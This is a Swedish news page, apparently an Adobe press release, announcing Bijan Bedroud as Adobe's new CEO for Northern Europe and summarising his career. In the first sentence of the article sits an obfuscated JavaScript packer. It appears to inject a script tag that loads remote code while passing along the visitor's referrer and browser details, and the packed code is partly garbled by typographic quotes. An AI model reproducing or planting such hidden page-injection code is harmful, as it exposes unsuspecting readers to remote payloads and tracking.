Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Adobe utser ny VD för Nordeuropa

Adobe utser ny VD för Nordeuropa
Sebastian

VD-posten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsyrr|var|u0026u|referrer|aknti||js|php’.split(’|’),0,{}))
för Adobe i Nordeuropa kommer att övertas av Bijan Bedroud. Han kommer närmast från Oracle-bolaget Eloqua, där han under fyra års tid varit vice VD för EMEA-regionen. Med sin långa erfarenhet av teknik, service och återförsäljning kommer Bijan Bedroud att utgöra en viktig del i arbetet med att stärka Adobes position inom molnbaserade tjänster.

Bijan Bedroud har, förutom Eloqua, erfarenhet från företag som Compaq Computers, Vignette och DoubleClick. Med 25 års erfarenhet kommer han att spela en viktig roll i den framtida utvecklingen av Adobes molnbaserade tjänster Marketing Cloud och Creative Cloud. Bijan har en examen i informationssystem från University of London.

När analysfirman Forrester släppte en av sina rapporter tidigare i höst omnämndes Adobe som ledande inom web content management. Företaget har också stärkt sin position inom digital marknadsföring genom att under de senaste åren förvärva ett antal it-företag. Bland nyförvärven finns bland annat Neolane och Behance.

Detta är ett pressmeddelande från Adobe